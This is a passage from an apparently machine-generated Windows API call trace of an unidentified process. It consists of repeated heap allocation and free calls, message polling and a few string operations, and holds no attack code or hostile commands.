dwFlags=0x0, lpMem=0x249bcb0 | out: hHeap=0x25c0000) returned 1 [0133.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498980 | out: hHeap=0x25c0000) returned 1 [0133.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498908 | out: hHeap=0x25c0000) returned 1 [0133.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249d9d0 | out: hHeap=0x25c0000) returned 1 [0133.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0133.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249d818 | out: hHeap=0x25c0000) returned 1 [0133.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498938 | out: hHeap=0x25c0000) returned 1 [0133.277] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0133.277] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0133.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0133.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bcb0 [0133.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498938 [0133.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498908 [0133.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249b9a0 [0133.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498980 [0133.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249b9a0 | out: hHeap=0x25c0000) returned 1 [0133.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249b9a0 [0133.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498890 [0133.277] CharUpperBuffW (in: lpsz="Os", cchLength=0x2 | out: lpsz="OS") returned 0x2 [0133.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498890 | out: hHeap=0x25c0000) returned 1 [0133.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249b9a0 | out: hHeap=0x25c0000) returned 1 [0133.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498980 | out: hHeap=0x25c0000) returned 1 [0133.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498908 | out: hHeap=0x25c0000) returned 1 [0133.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498938 | out: hHeap=0x25c0000) returned 1 [0133.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bcb0 | out: hHeap=0x25c0000) returned 1 [0133.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0133.277] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0133.277] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0133.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498938 [0133.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0133.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498938 | out: hHeap=0x25c0000) returned 1 [0133.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249d818 [0133.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498938 [0133.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498908 [0133.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bcb0 [0133.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249d9d0 [0133.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498980 [0133.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249b9a0 [0133.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498980 | out: hHeap=0x25c0000) returned 1 [0133.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249d610 [0133.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498980 [0133.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498890 [0133.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc60 [0133.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498938 | out: hHeap=0x25c0000) returned 1 [0133.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249d980 [0133.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249b9b0 [0133.278] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249d980 | out: hHeap=0x25c0000) returned 1 [0133.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249b9b0 | out: hHeap=0x25c0000) returned 1 [0133.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498938 [0133.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x249b9b0 [0133.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498920 [0133.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f98 [0133.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc50 [0133.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbd0 [0133.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbd0 | out: hHeap=0x25c0000) returned 1 [0133.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499010 [0133.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc50 | out: hHeap=0x25c0000) returned 1 [0133.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2498f80 [0133.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249d980 [0133.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498de8 [0133.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bc50 [0133.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498de8 | out: hHeap=0x25c0000) returned 1 [0133.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249dc50 [0133.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498de8 [0133.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ea8 [0133.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0133.279] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ff8 [0133.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbd0 [0133.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ff8 | out: hHeap=0x25c0000) returned 1 [0133.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249dc78 [0133.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ff8 [0133.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24988f0 [0133.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bc40 [0133.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249ee20 [0133.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e60 [0133.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bc10 [0133.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e60 | out: hHeap=0x25c0000) returned 1 [0133.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249ee48 [0133.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e60 [0133.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ec0 [0133.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249dc78 | out: hHeap=0x25c0000) returned 1 [0133.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbd0 | out: hHeap=0x25c0000) returned 1 [0133.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ff8 | out: hHeap=0x25c0000) returned 1 [0133.280] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249dc78 [0133.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ff8 [0133.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbd0 [0133.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f38 [0133.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc90 [0133.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc90 | out: hHeap=0x25c0000) returned 1 [0133.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc90 [0133.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f20 [0133.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e30 [0133.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc70 [0133.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ef0 [0133.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc70 | out: hHeap=0x25c0000) returned 1 [0133.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ef0 | out: hHeap=0x25c0000) returned 1 [0133.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e30 | out: hHeap=0x25c0000) returned 1 [0133.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f20 | out: hHeap=0x25c0000) returned 1 [0133.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc90 | out: hHeap=0x25c0000) returned 1 [0133.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc90 [0133.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc90 | out: hHeap=0x25c0000) returned 1 [0133.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0133.280] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc90 [0133.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f20 [0133.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e30 [0133.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc70 [0133.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ef0 [0133.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f08 [0133.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc80 [0133.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498db8 [0133.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498dd0 [0133.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbb0 [0133.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498968 [0133.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbb0 | out: hHeap=0x25c0000) returned 1 [0133.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498fe0 [0133.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbb0 [0133.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbb0 | out: hHeap=0x25c0000) returned 1 [0133.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e90 [0133.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbb0 [0133.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbb0 | out: hHeap=0x25c0000) returned 1 [0133.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498d70 [0133.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbb0 [0133.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e78 [0133.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498968 | out: hHeap=0x25c0000) returned 1 [0133.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498dd0 | out: hHeap=0x25c0000) returned 1 [0133.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498fe0 | out: hHeap=0x25c0000) returned 1 [0133.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e90 | out: hHeap=0x25c0000) returned 1 [0133.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498db8 | out: hHeap=0x25c0000) returned 1 [0133.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc80 | out: hHeap=0x25c0000) returned 1 [0133.282] lstrlenW (lpString="20") returned 2 [0133.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498d70 | out: hHeap=0x25c0000) returned 1 [0133.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbb0 | out: hHeap=0x25c0000) returned 1 [0133.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e78 | out: hHeap=0x25c0000) returned 1 [0133.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f08 | out: hHeap=0x25c0000) returned 1 [0133.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ef0 | out: hHeap=0x25c0000) returned 1 [0133.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc70 | out: hHeap=0x25c0000) returned 1 [0133.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ef0 [0133.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f08 [0133.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bc70 [0133.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e30 | out: hHeap=0x25c0000) returned 1 [0133.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f20 | out: hHeap=0x25c0000) returned 1 [0133.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc90 | out: hHeap=0x25c0000) returned 1 [0133.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f08 | out: hHeap=0x25c0000) returned 1 [0133.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc70 | out: hHeap=0x25c0000) returned 1 [0133.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ef0 | out: hHeap=0x25c0000) returned 1 [0133.282] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.282] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc70 [0133.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ef0 [0133.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f08 [0133.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc90 [0133.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f20 [0133.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e30 [0133.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbb0 [0133.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e78 [0133.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498d70 [0133.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc80 [0133.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498db8 [0133.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc80 | out: hHeap=0x25c0000) returned 1 [0133.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e90 [0133.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc80 [0133.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc80 | out: hHeap=0x25c0000) returned 1 [0133.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498fe0 [0133.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc80 [0133.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc80 | out: hHeap=0x25c0000) returned 1 [0133.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498dd0 [0133.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bc80 [0133.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498968 [0133.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498db8 | out: hHeap=0x25c0000) returned 1 [0133.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498d70 | out: hHeap=0x25c0000) returned 1 [0133.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e90 | out: hHeap=0x25c0000) returned 1 [0133.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498fe0 | out: hHeap=0x25c0000) returned 1 [0133.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e78 | out: hHeap=0x25c0000) returned 1 [0133.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbb0 | out: hHeap=0x25c0000) returned 1 [0133.284] lstrlenW (lpString="31") returned 2 [0133.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498dd0 | out: hHeap=0x25c0000) returned 1 [0133.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc80 | out: hHeap=0x25c0000) returned 1 [0133.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498968 | out: hHeap=0x25c0000) returned 1 [0133.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e30 | out: hHeap=0x25c0000) returned 1 [0133.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f20 | out: hHeap=0x25c0000) returned 1 [0133.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc90 | out: hHeap=0x25c0000) returned 1 [0133.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f20 [0133.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e30 [0133.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bc90 [0133.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f08 | out: hHeap=0x25c0000) returned 1 [0133.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ef0 | out: hHeap=0x25c0000) returned 1 [0133.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc70 | out: hHeap=0x25c0000) returned 1 [0133.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e30 | out: hHeap=0x25c0000) returned 1 [0133.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc90 | out: hHeap=0x25c0000) returned 1 [0133.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f20 | out: hHeap=0x25c0000) returned 1 [0133.285] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.285] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc90 [0133.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f20 [0133.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e30 [0133.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc70 [0133.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ef0 [0133.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f08 [0133.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc80 [0133.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498968 [0133.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498dd0 [0133.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbb0 [0133.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e78 [0133.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbb0 | out: hHeap=0x25c0000) returned 1 [0133.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498fe0 [0133.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbb0 [0133.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbb0 | out: hHeap=0x25c0000) returned 1 [0133.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e90 [0133.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbb0 [0133.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbb0 | out: hHeap=0x25c0000) returned 1 [0133.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498d70 [0133.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbb0 [0133.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498db8 [0133.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e78 | out: hHeap=0x25c0000) returned 1 [0133.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498dd0 | out: hHeap=0x25c0000) returned 1 [0133.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498fe0 | out: hHeap=0x25c0000) returned 1 [0133.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e90 | out: hHeap=0x25c0000) returned 1 [0133.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498968 | out: hHeap=0x25c0000) returned 1 [0133.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc80 | out: hHeap=0x25c0000) returned 1 [0133.286] lstrlenW (lpString="20") returned 2 [0133.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498d70 | out: hHeap=0x25c0000) returned 1 [0133.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbb0 | out: hHeap=0x25c0000) returned 1 [0133.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498db8 | out: hHeap=0x25c0000) returned 1 [0133.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f08 | out: hHeap=0x25c0000) returned 1 [0133.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ef0 | out: hHeap=0x25c0000) returned 1 [0133.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc70 | out: hHeap=0x25c0000) returned 1 [0133.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ef0 [0133.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f08 [0133.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bc70 [0133.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e30 | out: hHeap=0x25c0000) returned 1 [0133.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f20 | out: hHeap=0x25c0000) returned 1 [0133.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc90 | out: hHeap=0x25c0000) returned 1 [0133.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f08 | out: hHeap=0x25c0000) returned 1 [0133.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc70 | out: hHeap=0x25c0000) returned 1 [0133.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ef0 | out: hHeap=0x25c0000) returned 1 [0133.287] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, 